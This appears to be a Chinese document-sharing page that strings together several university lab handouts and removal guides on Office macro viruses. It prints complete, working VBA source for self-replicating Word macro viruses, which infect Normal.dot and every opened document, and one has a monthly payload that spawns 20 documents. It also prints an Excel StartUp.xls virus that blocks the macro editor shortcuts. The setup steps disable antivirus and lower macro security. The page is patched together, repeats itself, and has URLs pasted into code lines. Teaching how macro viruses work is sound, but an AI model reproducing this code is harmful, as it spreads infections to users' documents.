Word宏病毒实验
Word宏病毒实验
1. 实验目的
Word宏是指能组织到一起为独立命令使用的一系列Word指令,它能使日常工作变得容易。本实验演示了宏的编写,通过两个简单的宏病毒示例,说明宏的原理及其安全漏洞和缺陷,理解宏病毒的作用机制,从而加强对宏病毒的认识,提高防范意识。 2. 实验所需条件和环境
硬件设备:局域网,终端PC机。
系统软件:Windows系列操作系统
支撑软件:Word 2003
软件设置:关闭杀毒软;打开Word 2003,在工具,宏,安全性中,将安全级别设置为低,在可靠发行商选项卡中,选择信任任何所有安装的加载项和模板,选择信任visual basic项目的访问
实验环境配置如下图所示:
受感染
Word文档
受感染终端被感染终端
宏病毒传播示意图
3. 实验内容和分析
为了保证该实验不至于造成较大的破坏性,进行实验感染后,被感染终端不要打开过多
的word文档,否则清除比较麻烦(对每个打开过的文档都要清除)。
3.1. 例1 自我复制,感染word公用模板和当前文档代码如下:
'Micro-Virus
Sub Document_Open()
On Error Resume Next
Application.DisplayStatusBar = False Options.SaveNormalPrompt =
False Ourcode =
ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100) Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule
If ThisDocument = NormalTemplate Then
Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule
End If
With Host
If .Lines(1.1) <> "'Micro-Virus" Then
.DeleteLines 1, .CountOfLines
.InsertLines 1, Ourcode
.ReplaceLine 2, "Sub Document_Close()"
If ThisDocument = nomaltemplate Then
.ReplaceLine 2, "Sub Document_Open()"
ActiveDocument.SaveAs ActiveDocument.FullName
End If
End If
End With
MsgBox "MicroVirus by Content Security Lab" End Sub
打开一个word文档,然后按Alt+F11调用宏编写窗口(工具,宏,Visual Basic,宏编辑器),在左侧的project—>Microsoft Word对象,ThisDocument中输入以上
代码,保存,此时当前word文档就含有宏病毒,只要下次打开这个word文档,就会执行以上代码,并将自身复制到Normal.dot(word文档的公共模板)和当前文档的ThisDocument中,同时改变函数名(模板中为Document_Close,当前文档为Document_Open),此时所有的word文档打开和关闭时,都将运行以上的病毒代码,可以加入适当的恶意代码,影响word的正常使用,本例中只是简单的跳出一个提示框。
3.1.1. 代码解释
以上代码的基本执行流程如下:
1) 进行必要的自我保护
Application.DisplayStatusBar = False Options.SaveNormalPrompt = False
高明的病毒编写者其自我保护将做得非常好,可以使word的一些工具栏失效,例如将
工具菜单中的宏选项屏蔽,也可以修改注册表达到很好的隐藏效果。
本例中只是屏蔽状态栏,以免显示宏的运行状态,并且修改公用模板时自动保存,不给
用户提示。
2) 得到当前文档的代码对象和公用模板的代码对象
Ourcode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100)
Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule If ThisDocument = NormalTemplate Then
Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule End If
3) 检查模板是否已经感染病毒,如果没有,则复制宏病毒代码到模板,并且修改函数名。
With Host
If .Lines(1.1) <> "'Micro-Virus" Then
.DeleteLines 1, .CountOfLines
.InsertLines 1, Ourcode
.ReplaceLine 2, "Sub Document_Close()"
If ThisDocument = nomaltemplate Then
.ReplaceLine 2, "Sub Document_Open()"
ActiveDocument.SaveAs ActiveDocument.FullName
End If
End If
End With
4) 执行恶意代码
MsgBox "MicroVirus by Content Security Lab"
3.2. 例2 具有一定破坏性的宏
我们可以对上例中的恶意代码稍加修改,使其具有一定的破坏性(这里以著名宏病毒“台
湾一号”的恶意代码部分为基础,为使其在word2003版本中运行,且降低破坏性,对源代
码作适当修改)。
完整代码如下:
'moonlight
Dim nm(4)
Sub Document_Open()
'DisableInput 1
Set ourcodemodule =
ThisDocument.VBProject.VBComponents(1).CodeModule
Set host = NormalTemplate.VBProject.VBComponents(1).CodeModule If ThisDocument = NormalTemplate Then
Set host = ActiveDocument.VBProject.VBComponents(1).CodeModule End If
With host
If .Lines(1, 1) <> "'moonlight" Then
.DeleteLines 1, .CountOfLines
.InsertLines 1, ourcodemodule.Lines(1, 100)
.ReplaceLine 3, "Sub Document_Close()"
If ThisDocument = NormalTemplate Then
.ReplaceLine 3, "Sub Document_Open()"
ActiveDocument.SaveAs ActiveDocument.FullName
End If
End If
End With
Count = 0
If Day(Now()) = 1 Then
try:
On Error GoTo try
test = -1
con = 1
tog$ = ""
i = 0
While test = -1
For i = 0 To 4
nm(i) = Int(Rnd() * 10)
con = con * nm(i)
If i = 4 Then
tog$ = tog$ + Str$(nm(4)) + "=?"
GoTo beg
End If
tog$ = tog$ + Str$(nm(i)) + "*"
Next i
beg:
Beep
ans$ = InputBox$("今天是" + Date$ + ",跟你玩一个心算游戏" + Chr$(13) + "若你答错,只好接受震撼教育......" + Chr$(13) + tog$, "台湾NO.1 Macro Virus")
If RTrim$(LTrim$(ans$)) = LTrim$(Str$(con)) Then
Documents.Add
Selection.Paragraphs.Alignment = wdAlignParagraphCenter
Beep
With Selection.Font
.Name = "细明体"
.Size = 16
.Bold = 1
.Underline = 1
End With
Selection.InsertAfter Text:="何谓宏病毒" Selection.InsertParagraphAfter
Beep
Selection.InsertAfter Text:="答案:" Selection.Font.Italic = 1
Selection.InsertAfter Text:="我就是......" Selection.InsertParagraphAfter
Selection.InsertParagraphAfter
Selection.Font.Italic = 0
Beep
Selection.InsertAfter Text:="如何预防宏病毒" Selection.InsertParagraphAfter
Beep
Selection.InsertAfter Text:="答案:" Selection.Font.Italic = 1
Selection.InsertAfter Text:="不要看我......" GoTo out
Else
Count = Count + 1
For j = 1 To 20
Beep
Documents.Add
Next j
Selection.Paragraphs.Alignment = wdAlignParagraphCenter
Selection.InsertAfter Text:="宏病毒"
If Count = 2 Then GoTo out
GoTo try
End If
Wend
End If
out:
End Sub
该病毒的效果如下:当打开被感染的word文档时,首先进行自我复制,感染word模板,然后检查日期,看是否是1日(即在每月的1日会发作),然后跳出一个对话框,要求用户进行一次心算游戏,这里只用四个小于10的数相乘,如果作者的计算正确,那么就会新建一个文档,跳出如下字幕:
何谓宏病毒
答案:我就是......
如何预防宏病毒
答案:不要看我......如果计算错误,新建20个写有“宏病毒”字样的word
文档,然后再一次进行心算游戏,总共进行3次,然后跳出程序。关闭文档的时候也会执行同样的询问。
4. 清除宏病毒
对每一个受感染的word文档进行如下操作。
打开受感染的word文档,进入宏编辑环境(Alt+F11),打开Normal,Microsoft Word对象,This Document,清除其中的病毒代码(只要删除所有内容即可)。
然后打开Project,Microsoft Word,This Document,清除其中的病毒代码。
实际上,模板的病毒代码只要在处理最后一个受感染文件时清除即可,然而清除模板病毒后,如果重新打开其他已感染文件,模板将再次被感染,因此为了保证病毒被清除,可以查看每一个受感染文档的模板,如果存在病毒代码,都进行一次清除。
Word宏病毒
Word宏病毒 1.实验目的(后果自负) Word宏是指能组织到一起为独立命令使用的一系列Word指令,它能使日常工作变得容易。本实验演示了宏的编写,通过两个简单的宏病毒示例,说明宏的原理及其安全漏洞和缺陷,理解宏病毒的作用机制,从而加强对宏病毒的认识,提高防范意识。 2.实验所需条件和环境 硬件设备:局域网,终端PC机。 系统软件:Windows系列操作系统 支撑软件:Word 2003 软件设置:关闭杀毒软;打开Word 2003,在工具→宏→安全性中,将安全级别设置为低,在可靠发行商选项卡中,选择信任任何所有安装的加载项和模板,选择信任visual basic项目的访问 实验环境配置如下图所示: 受感染终端 受感染 Word文档 被感染终端宏病毒传播示意图 3.实验内容和分析 为了保证该实验不至于造成较大的破坏性,进行实验感染后,被感染终端不要打开过
多的word文档,否则清除比较麻烦(对每个打开过的文档都要清除)。 3.1. 例1 自我复制,感染word公用模板和当前文档 代码如下: 'Micro-Virus Sub Document_Open() On Error Resume Next Application.DisplayStatusBar = False Options.SaveNormalPrompt = False Ourcode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100) Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule If ThisDocument = NormalTemplate Then Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule End If With Host If .Lines(1.1) <> "'Micro-Virus" Then .DeleteLines 1, .CountOfLines .InsertLines 1, Ourcode .ReplaceLine 2, "Sub Document_Close()" If ThisDocument = nomaltemplate Then .ReplaceLine 2, "Sub Document_Open()" ActiveDocument.SaveAs ActiveDocument.FullName End If End If End With MsgBox "MicroVirus by Content Security Lab" End Sub 打开一个word文档,然后按Alt+F11调用宏编写窗口(工具→宏→Visual Basic→宏编辑器),在左侧的project—>Microsoft Word对象→ThisDocument中输入以上代码,保存,此时当前word文档就含有宏病毒,只要下次打开这个word文档,就会执行以上代码,并将自身复制到Normal.dot(word文档的公共模板)和当前文档的ThisDocument中,同时改变函数名(模板中为Document_Close,当前文档为Document_Open),此时所有的word文档打开和关闭时,都将运行以上的病毒代码,可以加入适当的恶意代码,影响word的正常使用,本例中只是简单的跳出一个提示框。 3.1.1.代码解释 以上代码的基本执行流程如下: 1)进行必要的自我保护 Application.DisplayStatusBar = False Options.SaveNormalPrompt = False 高明的病毒编写者其自我保护将做得非常好,可以使word的一些工具栏失效,例如将
宏病毒原理及防范
宏病毒原理及防范 一、常见宏病毒 1.startup宏病毒 宏病毒其实并不神秘,其工作原理是借用宏表4.0的auto_open事件启动病毒代码的复制和病毒文件的新建,新建的文件常放在xlsrt文件夹下。然后利用xlstart文件夹文件可以自动启动的原理把病毒代码复制到新打开的excel文件中。下面先看看startup宏病毒代码吧,注意红字部分。 Sub auto_open() On Error Resume Next If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then Application.ScreenUpdating = False ThisWorkbook.Sheets("StartUp").Copy ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls") n$ = https://www.360docs.net/doc/b110345265.html, ActiveWindow.Visible = False Workbooks("StartUp.xls").Save Workbooks(n$).Close (False) End If Application.OnSheetActivate = "StartUp.xls!cop" Application.OnKey "%{F11}", "StartUp.xls!escape" Application.OnKey "%{F8}", "StartUp.xls!escape" End Sub Sub cop() On Error Resume Next If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then Application.ScreenUpdating = False n$ = https://www.360docs.net/doc/b110345265.html, Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1) Sheets(n$).Select End If End Sub 2.book1病毒 book1病毒最明显的标志是打开excel时自动跳出一个book1空文件。这种病毒和startup病毒工作原理相似,但启动方式不太一样,该病毒会在excel文件中添加和复制一个宏表,利用宏表4。0程序的auto_open事件启动宏表中的宏代码,进行代码复制,病毒文件创建。打开中了book1病毒文件,在插入-名称里会出现很多陌生的定义名称,这些都是病毒启动名称。 二、病毒专杀 1.手工专杀 strartup.xls病毒。首先把宏的安全性设置为最高级,禁止所有宏运行。然后在电脑中搜索xlstart文件夹,找到后把该文件夹中的strartup.xls文件
宏病毒分析及清除实验
实验五宏病毒分析及清除实验 姓名:xxx 学号:xxxxxxxx 日期:2014年4月26日 专业:计算机科学与技术 一、实验目的 ?了解“宏病毒”机理; ?掌握清除宏病毒的方法; ?掌握采用“宏”和脚本语言进行编程的技术。 二、实验环境 ?Windows2003操作系统; ?Office Word2003字处理软件。 三、实验内容 1.软件设置 关闭杀毒软件;打开Word字处理软件,在工具“宏”的“安全性”中,将“安全级”设置为低,在“可靠发行商”选项卡中,选择信任任何所有安装的加载项和模板,选择“信任visual basic项目的访问”。 注意:为了保证该实验不至于造成较大的破坏性,进行实验感染后,被感染终端不要打开过多的word文档,否则清除比较麻烦(对每个打开过的文档都要清除)。 2.自我复制功能演示 打开一个word文档,然后按Alt+F11调用宏编写窗口(工具“宏”“Visual Basic宏编辑器”),在左侧的“project—>Microsoft Word”对象“ThisDocument”中输入以下代码(Macro-1),保存,此时当前word文档就含有宏病毒,只要下次打开这个word文档,就会执行以上代码,并将自身复制到Normal.dot(word文档的公共模板)和当前文档的ThisDocument中,同时改变函数名(模板中为Document_Close,当前文档为Document_Open),此时所有的word文档打开和关闭时,都将运行以上的病毒代码,可以加入适当的恶意代码,影响word的正常使用,本例中只是简单的跳出一个提示框。 完整代码如下:
清除宏病毒
清除宏病毒,名字是:StartUp.xls方法 --大白菜 文中图片都很小,看不清楚,可以用以下快捷方式:按住ctrl 向上滚动鼠标滑轮可以放大word,就可以看清楚图片了 病毒样本如下:(下面是宏病毒代码,电脑知识欠缺的,千万被乱动哦,小心弄巧成拙) Vba代码 =================宏病毒代码复制从下一行开始================= Sub auto_open() On Error Resume Next If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then Application.ScreenUpdating = False ThisWorkbook.Sheets("StartUp").Copy ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls") n$ = https://www.360docs.net/doc/b110345265.html, ActiveWindow.Visible = False Workbooks("StartUp.xls").Save Workbooks(n$).Close (False) End If Application.OnSheetActivate = "StartUp.xls!cop" Application.OnKey "%{F11}", "StartUp.xls!escape" Application.OnKey "%{F8}", "StartUp.xls!escape" End Sub Sub cop() On Error Resume Next If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then Application.ScreenUpdating = False n$ = https://www.360docs.net/doc/b110345265.html,
令人心烦的excel宏病毒终于清除了-推荐下载
令人心烦的excel宏病毒终于清除了!我如释重负地吁了口气,脑子一下子轻松了许多。你可能不知道,为了清除这个excel宏病毒,几天来,搞得我头昏脑胀。 大约两三个星期前,同事罗某告诉我,下面报上来的excel表,打开后出现了奇怪的现象:会自动打开一个book1的电子表格。他让我帮忙解决一下。我初步判断是宏病毒,默认打开的book1可能是excel的模板。我先“另存为”文件,找到book1的位置,删掉。同时把excel的宏安全性设置为高,禁止运行来历不明的宏,问题即解决了。 恰巧到下面去检查工作,某单位反映,电脑中病毒了,所以没有及时交表格。一问情况,与罗某讲的情况一样。我主动表示去“搞搞看”。但是情况并非如我猜想的那样。情况是:如果将宏的安全性设为非常高,禁用宏,会弹出一个警告:“出现了一个不能被禁止、又无法签署的Microsoft Excel 4.0 宏”,该表打不开;如果要打开这个表,必须降低excel宏安全性等级,将它设为中或低,即运行宏病毒,但又多出了一个book1表。即使将book1删除,仍然不行。面对这个新病毒,当时我不知该怎么办。 没过两天,罗某又来找我,说又出现了一种现象。我去看了,正与上次在下面检查时看到了excel 4.0 宏病毒一模一样。而且,下面有几个单位都说出现了宏病毒,上报来的表格中都有上面讲的问题。而且办公室有三台电脑都感染了excel 4.0 宏病毒。这么多的电脑感染了,引起了我的兴趣。
以前,我的电脑也多次中过病毒。我一般的做法就是上网查找 资料,把几篇文章介绍的方法结合起来,多试几次,几乎都能解决。可是这一次,情况完全不同。上网查了多次,讲宏病毒的文章特别多,但是介绍杀除方法的极少,而专门针对Microsoft Excel 4.0 宏病毒的只有一两篇提问的贴子,所介绍的方法就两样,一是在Excel 2003中禁止宏,二是用杀毒软件。第一种禁止是不行的,第二种杀毒软件我用了小红伞、360安全卫士,没查出病毒。 除此之外,还有一种临时救急的方法是:打开病毒表格,复制,再新建一个表格,选择性粘贴,只选值,最后保存。这个办法虽然行,但是面对那么多有宏病毒的表格,一个一个打开、复制、选择 性粘贴是不现实的。怎么办呢? 接下来,我的思路是选择一种不支持excel宏的电子表格软件,这 样也许就把宏病毒过滤了。我试验过的软件有:wps office 2003 到最新的2010版,Ashampoo Office 2010,OpenOffice 3.2,永中Office 2009。它们都提示发现了宏,有的说不支持,有的说可以禁用,重新保存后宏病毒仍然存在,要么再打开时软件死机。 但是试验中发现微软Office 2007 / 2010 Beta 可以打开表格,只是在菜单栏提示“禁止了宏”,不影响操作。然而,现在基层单 位的电脑配置都比较低,安装不了Office 2007 / 2010 Beta,再说Office 2007 / 2010 Beta的菜单怪怪的,很多人不习惯。最重要的是,这并没有从根本上解决问题,宏病毒依然在表格文件里。 有个单位的人对我说,他们请来了电脑公司人员,几个小青年,把
EXCEL宏病毒处理方法
Excel宏病毒(BOOK1病毒)处理方法 症状:第一次打开带病毒的EXCEL文档时,会提示“是否启用宏”对话框,以后每次打开EXCEL 文档时就会自动弹出一个Book1文档。 传播途径:主要以发送邮件或使用U盘时,接收了带病毒的EXCEL 文档。 处理步骤: 1、首先进行病毒查杀:使用360杀毒软件或瑞星杀毒软件查杀; 2然后将病毒源进删除: 在C:\Program Files\Microsoft Office\OFFICE11\xlstart\下,然后将book1文件删除。 查毒方式: 主要有360杀毒软件和瑞星杀毒软件两种,这里详细介绍瑞星杀毒软件的安装和使用方法。 StartUp.xls宏病毒清除方法及步骤 StartUp.xls宏病毒的现象: 1.打开excel文件时提示有宏 2.文件不能直接保存,只能另存 3.打开excel文件时,点击"窗口"->"取消隐藏",会打开一个Startup.xls 文件
StartUp.xls宏病毒清除方法及步骤:(excel宏病毒) 第一步:清除C:\Documents and Settings\administrator\Application Data\Microsoft\Excel\XLSTART下的StartUp.xls; (注意:其中有些事隐藏文件,你看不到,按照下面说的做就可以看到那些隐藏文件:打开我的电脑》》工具》》文件夹选项》》“隐藏受保护的操作系统文件(推荐)”前面的勾打掉》》选中“显示隐藏的文件、文件夹和驱动器”》》去掉“隐藏已知文件类型的扩展名”的勾。) 第二步:清除C:\Documents and Settings\administrator\Application Data\Microsoft\Excel\的Excel11.exe(约236K)及Excel11.xlb等名字中带有Excel11的文件。(删除后Excel程序会自动创建部分文件) 第三步:下载startup.xls并放入“C:\Documents and Settings\administrator\Application Data\Microsoft\Excel\XLSTART\”。 注:各大杀毒软件多数不能发现此病毒,仅有少数几款,如nod32可以发现,但清除时会直接删除文件,因此在发现此类病毒时,使用上述方法解决,或联系信息中心协助处理。
实验三 脚本病毒和宏病毒分析
实验三脚本病毒和宏病毒分析 一、实验目的 通过这项实验旨在使学生掌握Office下宏病毒的基本原理,主要包括它的传染机制、破坏机制以及怎样清除Office下的宏病毒。 二、实验环境 操作系统环境:Windows98/NT/2000/XP 编程环境:Office VBA 三、实验基础知识要求 Office VBA编程环境 四、实验任务 1.任务性质:验证性实验 2.任务描述:下面的示例中给出的是一个Word宏病毒的示例程序(只有传染模块),仔细阅读源程序,掌握Word宏病毒的传染过程。 3.任务步骤: (1)打开Word2000,新建一个文档名为“test”; (2)点击“工具-宏-宏”,在对话框“宏的位置”选择“test”,在宏名中输入“autoclose”,然后点击“创建”按钮; (3)在VBA编辑环境中输入示例程序中给出的代码,并保存,然后退出VBA; (4)点击“工具-宏-宏”,在对话框中点击“管理器”按钮,在管理器对话框中点击“宏方案项”标签;在宏方案项有效范围的“test.doc”中将“NewMacros”改名为“AOPEDMOK”; (5)点击“工具-宏-安全性”,在安全性对话框中的安全级标签中选择“低”,在可靠性来源标签中选择“信任对VB项目的访问”; (6)保存并关闭“test”文档; (7)新建一个文档test1,关闭后重新打开,观察test1是否被感染。 (8)清除此宏病毒,即要同时删除normal模板、所有活动模板、和染毒文件的autoclose 宏。 4.示例程序 Sub autoclose() ' autoclose Macro ' 宏在2005-8-26 由jingjd 创建 On Error Resume Next Application.DisplayAlerts = wdAlertsNone Application.EnableCancelKey = wdCancelDisabled Application.DisplayStatusBar = False 'Options.VirusProtection = False Options.SaveNormalPrompt = False Const VirusName = "AOPEDMOK" 'MsgBox ActiveDocument.VBProject.VBComponents.Item(2).Name 'MsgBox ActiveDocument.VBProject.VBComponents(2).Name Set Doc = ActiveDocument.VBProject.VBComponents Set Tmp = NormalTemplate.VBProject.VBComponents Const ExportSource = "E:\aopedmok.txt" For j = 1 To Doc.Count
OFFICE宏病毒彻底清除方法
办公室OFFICE宏病毒彻底清除方法最近办公室OFFICE宏病毒泛滥了,整个文件服务器上到处都是宏病毒,搞的办公室大家的电脑上都中了宏病毒,很是苦恼。相信有很多同仁也深有同感! 前期,杀毒软件360安全卫士、360杀毒、金山毒霸、宏病毒专杀都试了,百般无奈,自己查询了些资料,想出来一条好办法。 治病还是找根源,office宏病毒依赖于VBA插件,VBA百科:Visual Basic forApplications (VBA)是一种Visual Basic的一种宏语言,主要能用来扩展Windows 的应用程式功能,特别是Microsoft Office 软件。也可说是一种应用程式视觉化的Basic Scrip t 1994年发行的Excel 5.0版本中,即具备了VBA的宏功能。 所以我们在OFFCIE2OO安装文件中去掉VBA插件支持即可。 具体操作方法: 1 .打开开始——设置——控制面板,找到添加和删除程序,双击打开。 2.在添加和删除程序界面里,选择更改和删除程序,在程序目录中找到Microsoft office Professional Edition 2003 ,点击更改。 3?在弹出的OFFICE安装界面里,选择添加和删除功能,点击下一步。 4. 在复选框选择应用程序的高级自定义前面打勾。点击下一步。 5. 找到OFFICE共享功能。点+号展开详细子项。找到Visual Basic forApplications,点击前面▼,选择 X 不安装即可。 6. 点击更新,等待OFFICE S新完成,提示Microsoft office 2003已被成功的更新。点击确定就OK了。
宏病毒实验报告
宏病毒实验报告 2 邹文敏 一、实验目的 通过运行计算机代码,更加深刻的理解计算机代码。对计算机代码有一个初步的认识。 加深对宏病毒的感性认识,宏病毒是感染数据文件word,office 等。 二、实验内容 运行自我复制,感染word公用模板和当前文档;具有一定破坏性的宏;清除宏病毒。 三、实验步骤 实验一: 将word文档中的开发者工具打开;word 中心→信任选项→宏设计将信任选项打开
运行第一个实验Visual Basic →normal →Microsoft→the document Project→microsoft word对象→the document复制如下代码:'APMP Private Sub Document_Open() On Error Resume Next Application.DisplayStatusBar = False Options.VirusProtection = False Options.SaveNormalPrompt = False '以上都是基本的自我隐藏措施 MyCode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines( 1, 20) Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule If ThisDocument = NormalTemplate Then _ Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule
word宏恶意代码实验
计算机宏病毒分析 一、实验目的 ?了解“宏病毒”机理; ?掌握清除宏病毒的方法; ?掌握采用“宏”和脚本语言进行编程的技术。 二、实验环境 ?Windows 7 64位旗舰版 ?Office Word2010字处理软件。 三、实验要求 ?宏的编写; ?理解宏病毒的作用机制。 四、实验步骤: 1.软件设置 关闭杀毒软件;打开Word字处理软件,在工具“宏”的“安全性”中,将“安全级”设置为低,在“可靠发行商”选项卡中,选择信任任何所有安装的加载项和模板,选择“信任visual basic项目的访问”。 注意:为了保证该实验不至于造成较大的破坏性,进行实验感染后,被感染终端不要打开过多的word文档,否则清除比较麻烦(对每个打开过的文档都要清除)。 2.自我复制功能演示 打开一个word文档,然后按Alt+F11调用宏编写窗口(工具“宏”“Visual Basic宏编辑器”),在左侧的“project—>Microsoft Word”对象“ThisDocument”中输入以下代码(Macro-1),保存,此时当前word文档就含有宏病毒,只要下次打开这个word文档,就会执行以上代码,并将自身复制到Normal.dot(word 文档的公共模板)和当前文档的ThisDocument中,同时改变函数名(模板中为Document_Close,当前文档为Document_Open),此时所有的word文档打开和关闭时,都将运行以上的病毒代码,可以加入适当的恶意代码,影响word的正常使用,本例中只是简单的跳出一个提示框。 完整代码如下: 'Macro-1:Micro-Virus
一个简单宏病毒的感染与清楚
宏病毒实验 1. 实验目的 (1)理解宏病毒的概念、病毒机制、传播手段以及预防措施。 (2)观察一个简单宏病毒感染计算机后的现象,并寻找清除病毒的方法。 2. 实验原理 宏(Macro)是微软公司出品的Office软件包中所包含的一项特殊功能。微软公司设计此项功能的主要目的是给用户自动执行一些重复性的工作提供方便。它利用简单的语法,把常用的动作写成宏,用户工作时就可以直接利用事先编写好的宏自动运行,以完成某项特定的任务,而不必反复重复相同的工作。微软的Word Visual Basic for Application(VBA)是宏语言的标准。宏病毒正是利用Word VBA 编写的一些宏,是一种寄存在文档或模板中的计算机病毒。一旦打开含有宏病毒的文档,其中的宏就会执行,宏病毒被激活,转移到计算机中并驻留在Normal 模板上。以后所有自动保存的文档都会感染上这种宏病毒。 预防宏病毒有以下几种基本的方法: (1)防止执行自动宏:可以通过在DOS提示符下输入指令”WinWord.exe /m DisableAutoMacro”来防止打开Word文档时执行自动宏。另外,在打开或关闭文档时按下Shift键可以使文档不执行任何自动宏。 (2)保护Normal模板:可以采取以下几种方法对Normal模板进行保护。提示保存Normal模板;设置Normal模板的只读属性;设置密码保护;设置安全级别;按照自己的习惯设置Normal模板并进行备份,当被病毒感染时,使用备份模板覆盖当前模板。 (3)使用DisableAutoMacro功能。 3. 实验环境 虚拟机下Windows server 2003 4. 实验内容 本实验拟在虚拟机下感染一个简单的宏病毒,然后观察病毒对计算机有什么影响,最后寻求清除方法。
2020年东华大学计算机病毒课实验六宏病毒实验报告.pdf
计算机病毒实验报告 姓名: 学号: 老师: 日期:
一. 实验目的 Word宏是指能组织到一起为独立命令使用的一系列Word指令,它能使日常工作变得容易。本实验演示了宏的编写,通过两个简单的宏病毒示例,说明宏的原理及其安全漏洞和缺陷,理解宏病毒的作用机制,从而加强对宏病毒的认识,提高防范意识。 二. 实验内容 1. macro virus中的内容 2. 信安实验平台--->计算机病毒篇 ---->计算机宏病毒 3. 结合杀毒软件如诺顿、卡巴斯基等,观察病毒查杀现象 三. 实验环境 1. macro virus 硬件设备:局域网,终端PC机。 系统软件:Windows系列操作系统 支撑软件:Word 2003 软件设置:关闭杀毒软;打开Word 2003,在工具→宏→安全性中,将安全级别设置为低,在可靠发行商选项卡中,选择信任任何所有安装的加载项和模板,选择信任visual basic项目的访问. 实验环境配置如下图所示:
受感染终端受感染 Word 文档 被感染终端 2.计算机宏病毒 硬件设备:部署 WIN2003 系统的PC 机一台 软件工具:Office word2007
四.实验步骤及截图 1.自我复制,感染word公用模板和当前文档 打开一个word文档,然后按Alt+F11调用宏编写窗口(工具宏Visual Basic宏编辑器),在左侧的project—>Microsoft Word 对象ThisDocument中输入以上代码,保存,此时当前word文档就含有宏病毒 只要下次打开这个word文档,就会执行以上代码,并将自身复制到Normal.dot(word文档的公共模板)和当前文档的ThisDocument中,同时改变函数名(模板中为Document_Close,当前文档为Document_Open),此时所有的word文档打开和关闭时,都将运行以上的病毒代码,可以加入适当的恶意代码,影响word的正常使用,本例中只是简单的跳出一个提示框。
office宏病毒的解决方法
最近公司内宏病毒泛滥,尤其是WORD、EXCEL文件中的宏病毒在公司办公电脑上互相感染,影响了办公效率,给我们的日常办公造成了困扰。 经过测试,现在找到了一个比较有效的远离宏病毒的方法,即“删除OFFICE中的VBA”,操作步骤如下: 1、点开始—>控制面板->打开“添加删除程序“并找到“Microsoft office professional Edition2003” 2、单击按钮,出现OFFICE安装界面。
3、选择“添加或删除功能”,然后单击“下一步”。 4、在“选择应用程序的高级自定义”前打上勾,并单击“下一步”。
5、选择office共享功能下的“Visual Basic for Applications”项,下拉它前面的三角,选择“不安装”。此时它的前面就变成了一个红叉号,然后单击“更新”按钮。 7、显示出“Microsoft office 2003已被成功地更新”,单击“确定”
8、提示“重新启动计算机后,生效……”,单击按钮“是”,重新启动计算机,Office中的VBA已删除。 9、分别打开WORD、EXCEL,选择菜单栏中的“工具”-->宏-->安全性 选择安全级为“非常高”。
可靠发行商下面的“信任所有安装的加载项和模板”、“信任对于Visual Basic 项目的访问”这两项都不要选中。 (备注:第9项有的电脑不需要设置。) 删除了VBA后新建的文件,不会含有宏病毒了,但是原来的文件中有可能含有宏病毒。原文件的除毒方法: 1、打开文件时,如果提示“此工作簿已丢失了其VBA项目……”并且文件的标题上方显示着“只读” 2、点文件“另存为”
StartUp.xls宏病毒清除方法及步骤
StartUp.xls宏病毒清除方法及步骤 StartUp.xls宏病毒的现象: 1.打开excel文件时提示有宏 2.文件不能直接保存,只能另存 3.打开excel文件时,点击"窗口"->"取消隐藏",会打开一个Startup.xls文件 StartUp.xls宏病毒清除方法及步骤:(excel宏病毒) 第一步:清除C:\Documents and Settings\administrator\Application Data\Microsoft\Excel\XLSTART下的StartUp.xls; (注意:其中有些事隐藏文件,你看不到,按照下面说的做就可以看到那些隐藏文件:打开我的电脑》》工具》》文件夹选项》》“隐藏受保护的操作系统文件(推荐)”前面的勾打掉》》选中“显示隐藏的文件、文件夹和驱动器”》》去掉“隐藏已知文件类型的扩展名”的勾。)第二步:清除C:\Documents and Settings\administrator\Application Data\Microsoft\Excel\的Excel11.exe(约236K)及Excel11.xlb等名字中带有Excel11的文件。(删除后Excel程序会自动创建部分文件) 第三步:下载startup.xls并放入“C:\Documents and Settings\administrator\Application Data\Microsoft\Excel\XLSTART\”。 注:各大杀毒软件多数不能发现此病毒,仅有少数几款,如nod32可以发现,但清除时会直接删除文件,因此在发现此类病毒时,使用上述方法解决,或联系信息中心协助处理。
清除宏病毒方法
清除宏病毒方法 一、验证是否感染了宏病毒? 打开需要检查的文档,单击“文件”菜单栏,选择“另存为”命令,如果对话框中的保存类型固定为“文档模板”,则表示这个文件已经感染了宏病毒。 二、清除宏病毒的方法 1、 OFFICE2003方法:打开文档,工具――宏――宏(或者使用组合键“Alt +F8”,如OFFICE版本不同找不到选项,可以使用此组合键)调出宏对话框,如果在弹出的对话框中有已经记录的宏的话,那就极有可能是宏病毒,删除所有的宏就可以了。
比较复杂的宏病毒会将宏对话框屏蔽掉,这时就需要采用其他方法了。Word 环境中的宏病毒一般是存放在Microsoft Office目录下Templates子目录中的Normal.dot文件中,这时需要重新启动计算机,找到这个文件,并把它删除,再运行Word就可以了。但是有些宏病毒“知道”用户会找到No rmal.dot 并删除掉,所以它会在硬盘的多个目录中放上同样的No rmal.dot,如果只删除Templates下的一个,Word会按照Windows缺省的搜索路径进行搜索,这样会加载其他有毒的Normal.dot,并把删除掉的再重新恢复这时,只要使用Windows中查找文件的方法把硬盘中所有的Normal.dot全部删除就可以了。 2、设置宏安全性。Office2003方法,打开文档-工具-选项-安全性-宏 安全性-安全级。 Office20010方法,打开文档-文件-选项-信任中心-信任中心设置-宏设置-禁用所有宏,并且不通知。
3、使用宏病毒专杀工具全盘查杀。 可到https://www.360docs.net/doc/b110345265.html,/html/5254.html下载专杀工具。 安装“宏病毒专杀工具”,按照步骤一步步安装即可,安装完成后,进行全盘扫描查杀。
计算机病毒实验
计算机病毒实验报告
